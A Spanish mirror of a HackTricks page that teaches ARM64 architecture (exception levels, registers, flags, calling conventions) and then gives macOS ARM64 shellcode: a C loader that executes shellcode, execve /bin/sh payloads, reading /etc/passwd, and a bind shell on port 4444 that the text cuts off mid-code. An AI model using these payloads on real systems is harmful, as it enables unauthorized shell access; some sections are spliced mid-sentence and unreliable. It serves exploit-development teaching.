mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-10 12:18:52 +00:00
585 lines
32 KiB
Markdown
585 lines
32 KiB
Markdown
# Introducción a ARM64v8
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Otras formas de apoyar a HackTricks:
|
|
|
|
* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
## **Niveles de Excepción - EL (ARM64v8)**
|
|
|
|
En la arquitectura ARMv8, los niveles de ejecución, conocidos como Niveles de Excepción (ELs), definen el nivel de privilegio y las capacidades del entorno de ejecución. Hay cuatro niveles de excepción, que van desde EL0 hasta EL3, cada uno con un propósito diferente:
|
|
|
|
1. **EL0 - Modo Usuario**:
|
|
* Este es el nivel menos privilegiado y se utiliza para ejecutar código de aplicaciones regulares.
|
|
* Las aplicaciones que se ejecutan en EL0 están aisladas entre sí y del software del sistema, mejorando la seguridad y estabilidad.
|
|
2. **EL1 - Modo Kernel del Sistema Operativo**:
|
|
* La mayoría de los kernels de sistemas operativos se ejecutan en este nivel.
|
|
* EL1 tiene más privilegios que EL0 y puede acceder a recursos del sistema, pero con algunas restricciones para garantizar la integridad del sistema.
|
|
3. **EL2 - Modo Hipervisor**:
|
|
* Este nivel se utiliza para la virtualización. Un hipervisor que se ejecuta en EL2 puede gestionar múltiples sistemas operativos (cada uno en su propio EL1) que se ejecutan en el mismo hardware físico.
|
|
* EL2 proporciona características para la aislación y control de los entornos virtualizados.
|
|
4. **EL3 - Modo Monitor Seguro**:
|
|
* Este es el nivel más privilegiado y a menudo se utiliza para arranque seguro y entornos de ejecución confiables.
|
|
* EL3 puede gestionar y controlar accesos entre estados seguros y no seguros (como arranque seguro, sistema operativo confiable, etc.).
|
|
|
|
El uso de estos niveles permite una forma estructurada y segura de gestionar diferentes aspectos del sistema, desde aplicaciones de usuario hasta el software del sistema más privilegiado. El enfoque de ARMv8 hacia los niveles de privilegio ayuda a aislar efectivamente los diferentes componentes del sistema, mejorando así la seguridad y robustez del sistema.
|
|
|
|
## **Registros (ARM64v8)**
|
|
|
|
ARM64 tiene **31 registros de propósito general**, etiquetados de `x0` a `x30`. Cada uno puede almacenar un valor de **64 bits** (8 bytes). Para operaciones que requieren solo valores de 32 bits, los mismos registros se pueden acceder en un modo de 32 bits usando los nombres w0 a w30.
|
|
|
|
1. **`x0`** a **`x7`** - Estos se utilizan típicamente como registros temporales y para pasar parámetros a subrutinas.
|
|
* **`x0`** también lleva los datos de retorno de una función
|
|
2. **`x8`** - En el kernel de Linux, `x8` se utiliza como el número de llamada al sistema para la instrucción `svc`. **¡En macOS se utiliza x16!**
|
|
3. **`x9`** a **`x15`** - Más registros temporales, a menudo utilizados para variables locales.
|
|
4. **`x16`** y **`x17`** - **Registros de Llamada Intraprocedural**. Registros temporales para valores inmediatos. También se utilizan para llamadas a funciones indirectas y stubs de PLT (Tabla de Enlace de Procedimientos).
|
|
* **`x16`** se utiliza como el **número de llamada al sistema** para la instrucción **`svc`** en **macOS**.
|
|
5. **`x18`** - **Registro de plataforma**. Puede utilizarse como un registro de propósito general, pero en algunas plataformas, este registro está reservado para usos específicos de la plataforma: Puntero al bloque de entorno de hilo actual en Windows, o para apuntar a la estructura de tarea en ejecución actual en el kernel de linux.
|
|
6. **`x19`** a **`x28`** - Estos son registros preservados por el llamado. Una función debe preservar los valores de estos registros para su llamador, por lo que se almacenan en la pila y se recuperan antes de volver al llamador.
|
|
7. **`x29`** - **Puntero de marco** para realizar un seguimiento del marco de pila. Cuando se crea un nuevo marco de pila porque se llama a una función, el registro **`x29`** se **almacena en la pila** y la dirección del **nuevo** puntero de marco (**`sp`**) se **almacena en este registro**.
|
|
* Este registro también puede utilizarse como un **registro de propósito general** aunque generalmente se utiliza como referencia a **variables locales**.
|
|
8. **`x30`** o **`lr`**- **Registro de enlace**. Contiene la **dirección de retorno** cuando se ejecuta una instrucción `BL` (Branch with Link) o `BLR` (Branch with Link to Register) almacenando el valor de **`pc`** en este registro.
|
|
* También podría utilizarse como cualquier otro registro.
|
|
9. **`sp`** - **Puntero de pila**, utilizado para realizar un seguimiento de la parte superior de la pila.
|
|
* el valor de **`sp`** siempre debe mantenerse al menos con una **alineación de cuádruple palabra** o podría ocurrir una excepción de alineación.
|
|
10. **`pc`** - **Contador de programa**, que apunta a la siguiente instrucción. Este registro solo puede actualizarse a través de generaciones de excepciones, retornos de excepciones y ramificaciones. Las únicas instrucciones ordinarias que pueden leer este registro son las instrucciones de ramificación con enlace (BL, BLR) para almacenar la dirección de **`pc`** en **`lr`** (Registro de Enlace).
|
|
11. **`xzr`** - **Registro cero**. También llamado **`wzr`** en su forma de registro de **32 bits**. Puede utilizarse para obtener fácilmente el valor cero (operación común) o para realizar comparaciones usando **`subs`** como **`subs XZR, Xn, #10`** almacenando los datos resultantes en ninguna parte (en **`xzr`**).
|
|
|
|
Los registros **`Wn`** son la versión de **32 bits** del registro **`Xn`**.
|
|
|
|
### SIMD y Registros de Punto Flotante
|
|
|
|
Además, hay otros **32 registros de 128 bits de longitud** que se pueden utilizar en operaciones optimizadas de datos múltiples de instrucción única (SIMD) y para realizar aritmética de punto flotante. Estos se llaman registros Vn aunque también pueden operar en **64 bits**, **32 bits**, **16 bits** y **8 bits** y entonces se llaman **`Qn`**, **`Dn`**, **`Sn`**, **`Hn`** y **`Bn`**.
|
|
|
|
### Registros del Sistema
|
|
|
|
**Hay cientos de registros del sistema**, también llamados registros de propósito especial (SPRs), que se utilizan para **monitorear** y **controlar** el comportamiento de **procesadores**.\
|
|
Solo se pueden leer o configurar utilizando la instrucción especial dedicada **`mrs`** y **`msr`**.
|
|
|
|
Los registros especiales **`TPIDR_EL0`** y **`TPIDDR_EL0`** se encuentran comúnmente cuando se hace ingeniería inversa. El sufijo `EL0` indica el **nivel mínimo de excepción** desde el cual se puede acceder al registro (en este caso, EL0 es el nivel regular de excepción (privilegio) con el que se ejecutan los programas regulares).\
|
|
A menudo se utilizan para almacenar la **dirección base del área de almacenamiento local del hilo** de memoria. Por lo general, el primero es legible y escribible para programas que se ejecutan en EL0, pero el segundo se puede leer desde EL0 y escribir desde EL1 (como el kernel).
|
|
|
|
* `mrs x0, TPIDR_EL0 ; Leer TPIDR_EL0 en x0`
|
|
* `msr TPIDR_EL0, X0 ; Escribir x0 en TPIDR_EL0`
|
|
|
|
### **PSTATE**
|
|
|
|
**PSTATE** contiene varios componentes del proceso serializados en el registro especial visible por el sistema operativo **`SPSR_ELx`**, siendo X el **nivel de permiso de la excepción desencadenada** (esto permite recuperar el estado del proceso cuando la excepción termina).\
|
|
Estos son los campos accesibles:
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (724).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
* Las banderas de condición **`N`**, **`Z`**, **`C`** y **`V`**:
|
|
* **`N`** significa que la operación produjo un resultado negativo
|
|
* **`Z`** significa que la operación produjo cero
|
|
* **`C`** significa que la operación llevó
|
|
* **`V`** significa que la operación produjo un desbordamiento con signo:
|
|
* La suma de dos números positivos produce un resultado negativo.
|
|
* La suma de dos números negativos produce un resultado positivo.
|
|
* En la resta, cuando se resta un número negativo grande de un número positivo más pequeño (o viceversa), y el resultado no se puede representar dentro del rango del tamaño de bit dado.
|
|
|
|
{% hint style="warning" %}
|
|
No todas las instrucciones actualizan estas banderas. Algunas como **`CMP`** o **`TST`** lo hacen, y otras que tienen un sufijo s como **`ADDS`** también lo hacen.
|
|
{% endhint %}
|
|
|
|
* La bandera de **ancho de registro actual (`nRW`)**: Si la bandera tiene el valor 0, el programa se ejecutará en el estado de ejecución AArch64 una vez reanudado.
|
|
* El **Nivel de Excepción actual** (**`EL`**): Un programa regular que se ejecuta en EL0 tendrá el valor 0
|
|
* La bandera de **paso a paso único** (**`SS`**): Utilizada por depuradores para realizar un paso a paso único configurando la bandera SS en 1 dentro de **`SPSR_ELx`** a través de una excepción. El programa ejecutará un paso y emitirá una excepción de paso único.
|
|
* La bandera de estado de excepción **ilegal** (**`IL`**): Se utiliza para marcar cuando un software privilegiado realiza una transferencia de nivel de excepción inválida, esta bandera se establece en 1 y el procesador desencadena una excepción de estado ilegal.
|
|
* Las banderas **`DAIF`**: Estas banderas permiten a un programa privilegiado enmascarar selectivamente ciertas excepciones externas.
|
|
* Si **`A`** es 1 significa que se desencadenarán **abortos asíncronos**. La **`I`** configura para responder a **Solicitudes de Interrupción** de hardware externo (IRQs). y la F está relacionada con **Solicitudes de Interrupción Rápida** (FIRs).
|
|
* Las banderas de selección de **puntero de pila** (**`SPS`**): Los programas privilegiados que se ejecutan en EL1 y superior pueden alternar entre usar su propio registro de puntero de pila y el del modelo de usuario (por ejemplo, entre `SP_EL1` y `EL0`). Este cambio se realiza escribiendo en el registro especial **`SPSel`**. Esto no se puede hacer desde EL0.
|
|
|
|
## **Convención de Llamadas (ARM64v8)**
|
|
|
|
La convención de llamadas ARM64 especifica que los **primeros ocho parámetros** de una función se pasan en los registros **`x0` a `x7`**. **Parámetros adicionales** se pasan en la **pila**. El valor de **retorno** se pasa de vuelta en el registro **`x0`**, o en **`x1`** también **si tiene 128 bits de longitud**. Los registros **`x19`** a **`x30`** y **`sp`** deben ser **preservados** a través de las llamadas a funciones.
|
|
|
|
Al leer una función en ensamblador, busque el **prólogo y epílogo de la función**. El **prólogo** generalmente implica **guardar el puntero de marco (`x29`)**, **establecer** un **nuevo puntero de marco**, y **asignar espacio en la pila**. El **epílogo** generalmente implica **restaurar el puntero de marco guardado** y **retornar** de la función.
|
|
|
|
### Convención de Llamadas en Swift
|
|
|
|
Swift tiene su propia **convención de llamadas** que se puede encontrar en [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64)
|
|
|
|
## **Instrucciones Comunes (ARM64v8)**
|
|
|
|
Las instrucciones ARM64 generalmente tienen el **formato `opcode dst, src1, src2`**, donde **`opcode`** es la **operación** que se realizará (como `add`, `sub`, `mov`, etc.), **`dst`** es el registro **destino** donde se almacenará el resultado, y **`src1`** y **`src2`** son los registros **fuente**. También se pueden utilizar valores inmediatos en lugar de registros fuente.
|
|
|
|
* **`mov`**: **Mover** un valor de un **registro** a otro.
|
|
* Ejemplo: `mov x0, x1` — Esto mueve el valor de `x1` a `x0`.
|
|
* **`ldr`**: **Cargar** un valor de la **memoria** en un **registro**.
|
|
* Ejemplo: `ldr x0, [x1]` — Esto carga un valor de la ubicación de memoria señalada por `x1` en `x0`.
|
|
* **`str`**: **Almacenar** un valor de un **registro** en la **memoria**.
|
|
* Ejemplo: `str x0, [x1]` — Esto almacena el valor en `x0` en la ubicación de memoria señalada por `x1`.
|
|
* **`ldp`**: **Cargar Par de Registros**. Esta instrucción **carga dos registros** de **ubicaciones de memoria consecutivas**. La dirección de memoria se forma típicamente sumando un desplazamiento al valor en otro registro.
|
|
* Ejemplo: `ldp x0, x1, [x2]` — Esto carga `x0` y `x1` de las ubicaciones de memoria en `x2` y `x2 + 8`, respectivamente.
|
|
* **`stp`**: **Almacenar Par de Registros**. Esta instrucción **almacena dos registros** en **ubicaciones de memoria consecutivas**. La dirección de memoria se forma típicamente sumando un desplazamiento al valor en otro registro.
|
|
* Ejemplo: `stp x0, x1, [x2]` — Esto almacena `x0` y `x1` en las ubicaciones de memoria en `x2` y `x2 + 8`, respectivamente.
|
|
* **`add`**: **Sumar** los valores de dos registros y almacenar el resultado en un registro.
|
|
* Sintaxis: add(s) Xn1, Xn2, Xn3 | #imm, \[shift #N | RRX]
|
|
* Xn1 -> Destino
|
|
* Xn2 -> Operando 1
|
|
* Xn3 | #imm -> Operando 2 (registro o inmediato)
|
|
* \[shift #N | RRX] -> Realizar un desplazamiento o llamar a RRX
|
|
* Ejemplo: `add x0, x1, x2` — Esto suma los valores en `x1` y `x2` y almacena el resultado en `x0`.
|
|
* `add x5, x5, #1, lsl #12` — Esto equivale a 4096 (un 1 desplazado 12 veces) -> 1 0000 0000 0000 0000  
|
|
* **`adds`** Esto realiza una `add` y actualiza las banderas
|
|
* **`
|
|
```armasm
|
|
ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment the stack pointer
|
|
```
|
|
{% endcode %}
|
|
|
|
3. **Retorno**: `ret` (devuelve el control al llamador utilizando la dirección en el registro de enlace)
|
|
|
|
## Estado de Ejecución AARCH32
|
|
|
|
Armv8-A soporta la ejecución de programas de 32 bits. **AArch32** puede funcionar en uno de **dos conjuntos de instrucciones**: **`A32`** y **`T32`** y puede cambiar entre ellos mediante **`interworking`**.\
|
|
Los programas privilegiados de 64 bits pueden programar la **ejecución de programas de 32 bits** ejecutando una transferencia de nivel de excepción al 32 bits menos privilegiado.\
|
|
Note que la transición de 64 bits a 32 bits ocurre con una disminución del nivel de excepción (por ejemplo, un programa de 64 bits en EL1 activando un programa en EL0). Esto se hace configurando el **bit 4 de** **`SPSR_ELx`** registro especial **a 1** cuando el hilo del proceso `AArch32` está listo para ser ejecutado y el resto de `SPSR_ELx` almacena el CPSR del programa **`AArch32`**. Luego, el proceso privilegiado llama a la instrucción **`ERET`** para que el procesador haga la transición a **`AArch32`** entrando en A32 o T32 dependiendo del CPSR**.**
|
|
|
|
El **`interworking`** ocurre utilizando los bits J y T del CPSR. `J=0` y `T=0` significa **`A32`** y `J=0` y `T=1` significa **T32**. Esto básicamente se traduce en configurar el **bit más bajo a 1** para indicar que el conjunto de instrucciones es T32.\
|
|
Esto se establece durante las **instrucciones de ramificación de interworking**, pero también se puede configurar directamente con otras instrucciones cuando el PC se establece como el registro de destino. Ejemplo:
|
|
|
|
Otro ejemplo:
|
|
```armasm
|
|
_start:
|
|
.code 32 ; Begin using A32
|
|
add r4, pc, #1 ; Here PC is already pointing to "mov r0, #0"
|
|
bx r4 ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32)
|
|
|
|
.code 16:
|
|
mov r0, #0
|
|
mov r0, #8
|
|
```
|
|
### Registros
|
|
|
|
Hay 16 registros de 32 bits (r0-r15). **Desde r0 hasta r14** pueden ser utilizados para **cualquier operación**, sin embargo, algunos de ellos suelen estar reservados:
|
|
|
|
* **`r15`**: Contador de programa (siempre). Contiene la dirección de la siguiente instrucción. En A32 actual + 8, en T32, actual + 4.
|
|
* **`r11`**: Puntero de Marco
|
|
* **`r12`**: Registro de llamada intra-procedural
|
|
* **`r13`**: Puntero de Pila
|
|
* **`r14`**: Registro de Enlace
|
|
|
|
Además, los registros están respaldados en **`registros bancados`**. Estos son lugares que almacenan los valores de los registros permitiendo realizar **cambios de contexto rápidos** en el manejo de excepciones y operaciones privilegiadas para evitar la necesidad de guardar y restaurar manualmente los registros cada vez.\
|
|
Esto se hace **guardando el estado del procesador del `CPSR` al `SPSR`** del modo de procesador al que se toma la excepción. Al retornar de la excepción, el **`CPSR`** se restaura desde el **`SPSR`**.
|
|
|
|
### CPSR - Registro de Estado del Programa Actual
|
|
|
|
En AArch32 el CPSR funciona de manera similar a **`PSTATE`** en AArch64 y también se almacena en **`SPSR_ELx`** cuando se toma una excepción para restaurar luego la ejecución:
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (725).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
Los campos están divididos en algunos grupos:
|
|
|
|
* Registro de Estado del Programa de Aplicación (APSR): Banderas aritméticas y accesibles desde EL0
|
|
* Registros de Estado de Ejecución: Comportamiento del proceso (gestionado por el SO).
|
|
|
|
#### Registro de Estado del Programa de Aplicación (APSR)
|
|
|
|
* Las banderas **`N`**, **`Z`**, **`C`**, **`V`** (igual que en AArch64)
|
|
* La bandera **`Q`**: Se establece en 1 siempre que ocurre **saturación entera** durante la ejecución de una instrucción aritmética saturante especializada. Una vez que se establece en **`1`**, mantendrá el valor hasta que se establezca manualmente en 0. Además, no hay ninguna instrucción que verifique su valor implícitamente, debe hacerse leyéndolo manualmente.
|
|
* **`GE`** (Mayor o igual) Banderas: Se utiliza en operaciones SIMD (Instrucción Única, Datos Múltiples), como "suma paralela" y "resta paralela". Estas operaciones permiten procesar múltiples puntos de datos en una sola instrucción.
|
|
|
|
Por ejemplo, la instrucción **`UADD8`** **suma cuatro pares de bytes** (de dos operandos de 32 bits) en paralelo y almacena los resultados en un registro de 32 bits. Luego **establece las banderas `GE` en el `APSR`** basándose en estos resultados. Cada bandera GE corresponde a una de las adiciones de bytes, indicando si la adición para ese par de bytes **desbordó**.
|
|
|
|
La instrucción **`SEL`** utiliza estas banderas GE para realizar acciones condicionales.
|
|
|
|
#### Registros de Estado de Ejecución
|
|
|
|
* Los bits **`J`** y **`T`**: **`J`** debe ser 0 y si **`T`** es 0 se utiliza el conjunto de instrucciones A32, y si es 1, se utiliza el T32.
|
|
* **Registro de Estado de Bloque IT** (`ITSTATE`): Estos son los bits del 10-15 y 25-26. Almacenan condiciones para instrucciones dentro de un grupo prefijado con **`IT`**.
|
|
* **`E`** bit: Indica la **endiandad**. 
|
|
* **Bits de Máscara de Modo y Excepción** (0-4): Determinan el estado de ejecución actual. El **quinto** indica si el programa se ejecuta como 32 bits (un 1) o 64 bits (un 0). Los otros 4 representan el **modo de excepción actualmente en uso** (cuando ocurre una excepción y se está manejando). El número establecido **indica la prioridad actual** en caso de que se active otra excepción mientras se maneja esta.
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (728).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
* **`AIF`**: Ciertas excepciones pueden deshabilitarse utilizando los bits **`A`**, `I`, `F`. Si **`A`** es 1 significa que se activarán **abortos asíncronos**. El **`I`** configura para responder a **Solicitudes de Interrupción de Hardware Externo** (IRQs). y el F está relacionado con **Solicitudes de Interrupción Rápida** (FIRs).
|
|
|
|
## macOS
|
|
|
|
### Syscalls de BSD
|
|
|
|
Consulta [**syscalls.master**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master). Las syscalls de BSD tendrán **x16 > 0**.
|
|
|
|
### Trampas Mach
|
|
|
|
Consulta [**syscall_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall_sw.c.auto.html). Las trampas Mach tendrán **x16 < 0**, por lo que necesitas llamar a los números de la lista anterior con un **menos**: **`_kernelrpc_mach_vm_allocate_trap`** es **`-10`**.
|
|
|
|
También puedes consultar **`libsystem_kernel.dylib`** en un desensamblador para encontrar cómo llamar a estas syscalls (y de BSD):
|
|
```bash
|
|
# macOS
|
|
dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e
|
|
|
|
# iOS
|
|
dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64
|
|
```
|
|
{% hint style="success" %}
|
|
A veces es más fácil revisar el código **descompilado** de **`libsystem_kernel.dylib`** que revisar el **código fuente** porque el código de varios syscalls (BSD y Mach) se genera mediante scripts (revisa los comentarios en el código fuente), mientras que en la dylib puedes encontrar lo que se está llamando.
|
|
{% endhint %}
|
|
|
|
### Shellcodes
|
|
|
|
Para compilar:
|
|
```bash
|
|
as -o shell.o shell.s
|
|
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib
|
|
|
|
# You could also use this
|
|
ld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem
|
|
```
|
|
Para extraer los bytes:
|
|
```bash
|
|
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh
|
|
for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
|
|
echo -n '\\x'$c
|
|
done
|
|
```
|
|
<details>
|
|
|
|
<summary>Código en C para probar el shellcode</summary>
|
|
```c
|
|
// code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c
|
|
// gcc loader.c -o loader
|
|
#include <stdio.h>
|
|
#include <sys/mman.h>
|
|
#include <string.h>
|
|
#include <stdlib.h>
|
|
|
|
int (*sc)();
|
|
|
|
char shellcode[] = "<INSERT SHELLCODE HERE>";
|
|
|
|
int main(int argc, char **argv) {
|
|
printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));
|
|
|
|
void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
|
|
|
|
if (ptr == MAP_FAILED) {
|
|
perror("mmap");
|
|
exit(-1);
|
|
}
|
|
printf("[+] SUCCESS: mmap\n");
|
|
printf(" |-> Return = %p\n", ptr);
|
|
|
|
void *dst = memcpy(ptr, shellcode, sizeof(shellcode));
|
|
printf("[+] SUCCESS: memcpy\n");
|
|
printf(" |-> Return = %p\n", dst);
|
|
|
|
int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);
|
|
|
|
if (status == -1) {
|
|
perror("mprotect");
|
|
exit(-1);
|
|
}
|
|
printf("[+] SUCCESS: mprotect\n");
|
|
printf(" |-> Return = %d\n", status);
|
|
|
|
printf("[>] Trying to execute shellcode...\n");
|
|
|
|
sc = ptr;
|
|
sc();
|
|
|
|
return 0;
|
|
}
|
|
```
|
|
</details>
|
|
|
|
#### Shell
|
|
|
|
Tomado de [**aquí**](https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/shell.s) y explicado.
|
|
|
|
{% tabs %}
|
|
{% tab title="con adr" %}
|
|
```armasm
|
|
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
|
|
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
|
|
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
|
|
|
|
_main:
|
|
adr x0, sh_path ; This is the address of "/bin/sh".
|
|
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
|
|
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
|
|
mov x16, #59 ; Move the execve syscall number (59) into x16.
|
|
svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
|
|
|
|
sh_path: .asciz "/bin/sh"
|
|
```
|
|
{% endtab %}
|
|
|
|
{% tab title="con pila" %}
|
|
```armasm
|
|
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
|
|
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
|
|
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
|
|
|
|
_main:
|
|
; We are going to build the string "/bin/sh" and place it on the stack.
|
|
|
|
mov x1, #0x622F ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'.
|
|
movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'.
|
|
movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'.
|
|
movk x1, #0x68, lsl #48 ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'.
|
|
|
|
str x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`.
|
|
|
|
; Prepare arguments for the execve syscall.
|
|
|
|
mov x1, #8 ; Set x1 to 8.
|
|
sub x0, sp, x1 ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack.
|
|
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
|
|
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
|
|
|
|
; Make the syscall.
|
|
|
|
mov x16, #59 ; Move the execve syscall number (59) into x16.
|
|
svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
|
|
|
|
```
|
|
#### Leer con cat
|
|
|
|
El objetivo es ejecutar `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, por lo que el segundo argumento (x1) es un array de parámetros (lo que en memoria significa una pila de direcciones).
|
|
```armasm
|
|
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
|
|
.global _main ; Declare a global symbol _main
|
|
.align 2 ; Align the beginning of the following code to a 4-byte boundary
|
|
|
|
_main:
|
|
; Prepare the arguments for the execve syscall
|
|
sub sp, sp, #48 ; Allocate space on the stack
|
|
mov x1, sp ; x1 will hold the address of the argument array
|
|
adr x0, cat_path
|
|
str x0, [x1] ; Store the address of "/bin/cat" as the first argument
|
|
adr x0, passwd_path ; Get the address of "/etc/passwd"
|
|
str x0, [x1, #8] ; Store the address of "/etc/passwd" as the second argument
|
|
str xzr, [x1, #16] ; Store NULL as the third argument (end of arguments)
|
|
|
|
adr x0, cat_path
|
|
mov x2, xzr ; Clear x2 to hold NULL (no environment variables)
|
|
mov x16, #59 ; Load the syscall number for execve (59) into x8
|
|
svc 0 ; Make the syscall
|
|
|
|
|
|
cat_path: .asciz "/bin/cat"
|
|
.align 2
|
|
passwd_path: .asciz "/etc/passwd"
|
|
```
|
|
#### Invocar comando con sh desde un fork para que el proceso principal no se mate
|
|
```armasm
|
|
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
|
|
.global _main ; Declare a global symbol _main
|
|
.align 2 ; Align the beginning of the following code to a 4-byte boundary
|
|
|
|
_main:
|
|
; Prepare the arguments for the fork syscall
|
|
mov x16, #2 ; Load the syscall number for fork (2) into x8
|
|
svc 0 ; Make the syscall
|
|
cmp x1, #0 ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html
|
|
beq _loop ; If not child process, loop
|
|
|
|
; Prepare the arguments for the execve syscall
|
|
|
|
sub sp, sp, #64 ; Allocate space on the stack
|
|
mov x1, sp ; x1 will hold the address of the argument array
|
|
adr x0, sh_path
|
|
str x0, [x1] ; Store the address of "/bin/sh" as the first argument
|
|
adr x0, sh_c_option ; Get the address of "-c"
|
|
str x0, [x1, #8] ; Store the address of "-c" as the second argument
|
|
adr x0, touch_command ; Get the address of "touch /tmp/lalala"
|
|
str x0, [x1, #16] ; Store the address of "touch /tmp/lalala" as the third argument
|
|
str xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments)
|
|
|
|
adr x0, sh_path
|
|
mov x2, xzr ; Clear x2 to hold NULL (no environment variables)
|
|
mov x16, #59 ; Load the syscall number for execve (59) into x8
|
|
svc 0 ; Make the syscall
|
|
|
|
|
|
_exit:
|
|
mov x16, #1 ; Load the syscall number for exit (1) into x8
|
|
mov x0, #0 ; Set exit status code to 0
|
|
svc 0 ; Make the syscall
|
|
|
|
_loop: b _loop
|
|
|
|
sh_path: .asciz "/bin/sh"
|
|
.align 2
|
|
sh_c_option: .asciz "-c"
|
|
.align 2
|
|
touch_command: .asciz "touch /tmp/lalala"
|
|
```
|
|
#### Bind shell
|
|
|
|
Bind shell de [https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s](https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s) en el **puerto 4444**
|
|
```armasm
|
|
.section __TEXT,__text
|
|
.global _main
|
|
.align 2
|
|
_main:
|
|
call_socket:
|
|
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
|
|
mov x16, #97
|
|
lsr x1, x16, #6
|
|
lsl x0, x1, #1
|
|
mov x2, xzr
|
|
svc #0x1337
|
|
|
|
// save s
|
|
mvn x3, x0
|
|
|
|
call_bind:
|
|
/*
|
|
* bind(s, &sockaddr, 0x10)
|
|
*
|
|
* struct sockaddr_in {
|
|
* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10
|
|
* sa_family_t sin_family; // AF_INET = 2
|
|
* in_port_t sin_port; // 4444 = 0x115C
|
|
* struct in_addr sin_addr; // 0.0.0.0 (4 bytes)
|
|
* char sin_zero[8]; // Don't care
|
|
* };
|
|
*/
|
|
mov x1, #0x0210
|
|
movk x1, #0x5C11, lsl #16
|
|
str x1, [sp, #-8]
|
|
mov x2, #8
|
|
sub x1, sp, x2
|
|
mov x2, #16
|
|
mov x16, #104
|
|
svc #0x1337
|
|
|
|
call_listen:
|
|
// listen(s, 2)
|
|
mvn x0, x3
|
|
lsr x1, x2, #3
|
|
mov x16, #106
|
|
svc #0x1337
|
|
|
|
call_accept:
|
|
// c = accept(s, 0, 0)
|
|
mvn x0, x3
|
|
mov x1, xzr
|
|
mov x2, xzr
|
|
mov x16, #30
|
|
svc #0x1337
|
|
|
|
mvn x3, x0
|
|
lsr x2, x16, #4
|
|
lsl x2, x2, #2
|
|
